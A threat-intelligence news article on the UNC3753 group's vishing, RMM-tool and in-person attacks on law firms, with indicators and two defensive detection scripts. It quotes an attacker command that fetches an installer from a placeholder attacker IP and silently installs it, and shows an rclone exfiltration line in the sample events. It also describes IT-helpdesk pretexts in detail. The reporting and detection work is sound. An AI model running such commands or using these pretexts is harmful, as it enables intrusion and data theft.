PROBABLYPWNED
Threat Intelligence | June 9, 2026 | 4 min read

Silent Ransom Gang Sends Fake IT Staff Into Law Firm Offices

Mandiant tracks UNC3753 hitting dozens of law firms via vishing and physical intrusions. Data theft to extortion in under one hour. FBI issues flash alert.

Alex Kowalski

A cybercriminal gang has compromised dozens of US law firms by calling employees, posing as IT support, and in some cases physically walking into offices to steal data. Google's Mandiant published a detailed report on UNC3753—also known as Silent Ransom Group, Luna Moth, and Chatty Spider—documenting attacks from January through May 2026 that moved from initial contact to data theft in under an hour.

The FBI issued a flash alert warning of the group's escalation to physical intrusions, a capability that sets them apart from typical ransomware operations.

Attack Methodology

UNC3753's approach bypasses technical security controls by targeting human psychology. The campaign begins with innocuous invoice-themed emails sent from consumer email accounts—no malicious links, no attachments, just generic messages like "hello, here is the invcoie we talked about yesterday."

These emails establish pretext for follow-up phone calls. Attackers pose as internal IT helpdesk or security team members, claiming to address security issues or assist with data migration projects. They contact personnel across all seniority levels, identifying targets through public organizational websites.

The goal: convince victims to join screen-sharing sessions and download remote monitoring tools. Mandiant observed attackers holding up to five separate calls with the same target over three days until they succeeded.

Remote Access Tools

Once they have victims on screen-sharing platforms like Microsoft Teams, Zoom, or Quick Assist, attackers guide them to install remote monitoring and management (RMM) utilities:

  • AnyDesk
  • Bomgar
  • Zoho Assist
  • SuperOps RMM agent

Attackers use Privnote, a self-destructing message service, to deliver the installation commands, so the instruction text itself is gone once the victim has read it. The download and install still leave endpoint artifacts: the process-creation event, the dropped MSI in the working directory, and Windows Installer entries in the Application event log. A typical command observed:

    curl -sL "http://[attacker-ip]/installer" -o "SuperOps.msi" && msiexec /i "SuperOps.msi" /quiet

From Access to Exfiltration

Once inside, UNC3753 moves fast. They enumerate systems, map OneDrive folders, and crawl network drives. In law firms specifically, they target document management systems like iManage, running keyword searches for:

  • Tax forms (W-2, W-9, 1099)
  • Audit files
  • Corporate client agreements
  • Social Security numbers

Data staging happens in Downloads folders or Roaming profile paths. Exfiltration uses browser uploads to attacker-controlled cloud storage accounts—with folders renamed to mimic victim organization branding—or WinSCP and Rclone when browser uploads are restricted. In one incident, attackers exfiltrated 1.7 GB via Google Drive and 14.4 GB via WinSCP.
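The install chain above and the WinSCP/Rclone fallback both show up as process-creation events on the endpoint, which is where a detection engineer would catch them. The following triage script is an added example written for this article, not code from Mandiant or the report; the event fields follow Sysmon Event ID 1 naming, the sample events are constructed, and matching RMM agents by a substring of the binary name (rather than by signer and product metadata) is a simplifying assumption.

```python
import re

# Constructed process-creation events in the shape of Sysmon Event ID 1
# fields. These are made up for the example, not events from the report.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "User": r"LAW\jdoe",
     "CommandLine": 'cmd.exe /c curl -sL "http://203.0.113.10/installer" '
                    '-o "SuperOps.msi" && msiexec /i "SuperOps.msi" /quiet'},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "User": r"LAW\jdoe",
     "CommandLine": 'msiexec /i "SuperOps.msi" /quiet'},
    {"Image": r"C:\Users\jdoe\Downloads\AnyDesk.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "User": r"LAW\jdoe",
     "CommandLine": r'"C:\Users\jdoe\Downloads\AnyDesk.exe"'},
    {"Image": r"C:\Users\jdoe\AppData\Roaming\rclone\rclone.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "User": r"LAW\jdoe",
     "CommandLine": r'rclone.exe copy "C:\Users\jdoe\Downloads\staging" gdrive:Acme-Legal -P'},
    # Benign: a managed software deployment running as SYSTEM from ProgramData.
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "User": r"NT AUTHORITY\SYSTEM",
     "CommandLine": r'msiexec /i "C:\ProgramData\Corp\Deploy\Office.msi" /qn'},
    # Benign: a lawyer opening a brief.
    {"Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "User": r"LAW\jdoe",
     "CommandLine": r'"WINWORD.EXE" /n "brief.docx"'},
]

# Name fragments of the agents the report lists (assumption: substring match
# on the binary or package name; a production rule keys on signer/product).
RMM_NAMES = ("anydesk", "bomgar", "beyondtrust", "zoho", "superops")
EXFIL_TOOLS = ("rclone", "winscp")
# Built-in or common downloaders that precede the silent install.
DOWNLOADERS = ("curl ", "curl.exe", "certutil", "bitsadmin", "invoke-webrequest", "iwr ", "wget")
# msiexec with a no-UI switch anywhere later on the same command line.
QUIET_MSI = re.compile(r"msiexec(\.exe)?\b.*?/(quiet|qn|passive)\b", re.I)
# Package staged in a user-writable location rather than a deployment share.
USER_WRITABLE = re.compile(r"\\(downloads|appdata|temp)\\", re.I)


def triage(events):
    """Return (index, user, reason) for every event worth an analyst's look."""
    findings = []
    for i, ev in enumerate(events):
        cmd = ev["CommandLine"].lower()
        image = ev["Image"].lower()
        name = image.rsplit("\\", 1)[-1]
        reason = None
        if QUIET_MSI.search(cmd) and any(d in cmd for d in DOWNLOADERS):
            # The whole Privnote one-liner as seen on the shell's command line.
            reason = "download-and-silent-install chain in one command line"
        elif name == "msiexec.exe" and QUIET_MSI.search(cmd) and (
                USER_WRITABLE.search(cmd) or any(n in cmd for n in RMM_NAMES)):
            # The child msiexec.exe event the chain spawns.
            reason = "silent MSI install of a user-staged or RMM package"
        elif any(n in name for n in RMM_NAMES):
            reason = "RMM agent binary launched: " + name
        elif any(t in name for t in EXFIL_TOOLS):
            reason = "bulk-transfer tool launched: " + name
        if reason:
            findings.append((i, ev["User"], reason))
    return findings


if __name__ == "__main__":
    for idx, user, reason in triage(SAMPLE_EVENTS):
        print(f"[{idx}] {user}: {reason}")
```

The point of the first two rules is that the chain fires twice: once on the parent shell whose command line carries both the fetch and the install, and once on the msiexec.exe child. Alert on either, because a victim who pastes the command into PowerShell rather than cmd.exe will produce a different parent but the same child.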

Physical Intrusion Capability

When remote social engineering fails, UNC3753 escalates to physical access. Attackers show up at offices claiming to image devices or create local backups, then exfiltrate data directly to external USB drives.

This capability is rare among cybercriminal groups and represents a significant operational investment. It also suggests the potential value of law firm data justifies the additional risk of in-person operations.

Extortion Timeline

The pace is aggressive. Mandiant observed data searches, staging, and theft initiated in under one hour from initial access. Unbranded extortion emails often arrive within 30 minutes of attackers exiting the victim environment.

Demands give organizations a three-day deadline and threaten:

  • Direct calls and emails to employees and clients
  • Publication on the LEAKEDDATA leak site
  • Regulatory fines and litigation warnings
  • Reputational damage scenarios

Why Law Firms

Legal services firms store concentrated repositories of sensitive client information: merger and acquisition plans, trade secrets, regulatory reports, and personal data. The reputational and regulatory exposure creates strong pressure to resolve extortion quietly—exactly what these attackers count on.

This targeting pattern aligns with broader trends. We've covered nation-state actors targeting professional services for similar reasons, though UNC3753's motivations appear purely financial.

Indicators of Compromise

Infrastructure IPs:

  • 192.236.147.131
  • 192.236.147.138
  • 193.141.60.212
  • 192.236.154.158
  • 192.236.146.173
  • 174.169.162.62
  • 64.94.84.97

Phishing domain patterns:

  • [organization]-itdesk[.]com
  • [organization]-it[.]com
  • [organization]-helpdesk[.]com

Defensive Recommendations

  1. Train staff specifically on UNC3753 tactics—generic phishing awareness won't cover vishing pretexts
  2. Require photo ID and escort for all external technical personnel
  3. Verify technician visits against pre-scheduled work orders with the actual vendor
  4. Block unauthorized RMM tools via application control policies
  5. Restrict removable media on corporate and BYOD endpoints
  6. Monitor for bulk file searches and rapid downloads in document management systems
  7. Implement conditional access restricting VPN and VDI to corporate-owned devices
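Recommendation 6 is the control that matches this group's behaviour inside a document management system: a handful of tax-form and SSN keyword searches followed by a download sweep, all within minutes. The burst detector below is an added example written for this article, not code from Mandiant or any DMS vendor; the pipe-delimited audit-line format, the sample users, and the thresholds are assumptions, and the sensitive-term list is taken from the keywords the report says the group searches for.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Keywords the report says UNC3753 searches for inside iManage.
SENSITIVE_TERMS = ("w-2", "w-9", "1099", "ssn", "social security", "audit", "agreement")
# Thresholds are assumptions; tune them against a firm's own baseline.
SEARCH_THRESHOLD = 4       # sensitive searches by one user inside WINDOW
DOWNLOAD_THRESHOLD = 25    # document downloads by one user inside WINDOW
WINDOW = timedelta(minutes=10)


def build_sample_log():
    """Constructed audit lines (timestamp|user|action|object); not real DMS output."""
    base = datetime(2026, 3, 12, 9, 0, 0)
    lines = []
    # jdoe: the attacker pattern, keyword sweep then a download sweep in minutes.
    for i, term in enumerate(["W-2", "W-9", "1099", "social security", "audit 2024"]):
        lines.append(f"{(base + timedelta(seconds=30 * i)).isoformat()}|jdoe|SEARCH|{term}")
    for i in range(30):
        ts = base + timedelta(minutes=3, seconds=8 * i)
        lines.append(f"{ts.isoformat()}|jdoe|DOWNLOAD|Clients/Acme/doc{i:03d}.pdf")
    # asmith: a normal morning, a few searches and downloads spread over an hour.
    for i in range(3):
        lines.append(f"{(base + timedelta(minutes=20 * i)).isoformat()}|asmith|SEARCH|engagement letter")
        lines.append(f"{(base + timedelta(minutes=20 * i + 5)).isoformat()}|asmith|DOWNLOAD|Clients/Beta/letter{i}.docx")
    return lines


def parse(line):
    ts, user, action, obj = line.split("|", 3)
    return datetime.fromisoformat(ts), user, action, obj


def detect_bursts(lines, window=WINDOW):
    """Sliding-window count per user; first alert per (user, kind) is returned."""
    searches = defaultdict(deque)    # user -> timestamps of sensitive searches
    downloads = defaultdict(deque)   # user -> timestamps of downloads
    alerts = {}
    events = sorted((parse(l) for l in lines), key=lambda e: e[0])
    for ts, user, action, obj in events:
        if action == "SEARCH" and any(t in obj.lower() for t in SENSITIVE_TERMS):
            q, threshold, kind = searches[user], SEARCH_THRESHOLD, "sensitive-search-burst"
        elif action == "DOWNLOAD":
            q, threshold, kind = downloads[user], DOWNLOAD_THRESHOLD, "download-burst"
        else:
            continue
        q.append(ts)
        while q and ts - q[0] > window:    # drop events that fell out of the window
            q.popleft()
        if len(q) >= threshold and (user, kind) not in alerts:
            alerts[(user, kind)] = {"user": user, "kind": kind,
                                    "count": len(q), "at": ts.isoformat()}
    return list(alerts.values())


if __name__ == "__main__":
    for a in detect_bursts(build_sample_log()):
        print(f"{a['at']} {a['user']}: {a['kind']} ({a['count']} in {WINDOW})")
```

Two design choices matter here. Counting sensitive searches separately from downloads means the keyword sweep alone raises an alert before the first document leaves the DMS, which is the only point at which a sub-hour intrusion can still be interrupted. And the window is anchored on event time rather than wall-clock time, so the same logic works for batch review of exported audit logs after the fact.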

The evolution from email-only campaigns to voice phishing to physical intrusions shows UNC3753 adapting to bypass security controls. Organizations—especially law firms and professional services—should assume their staff will be targeted and prepare accordingly.
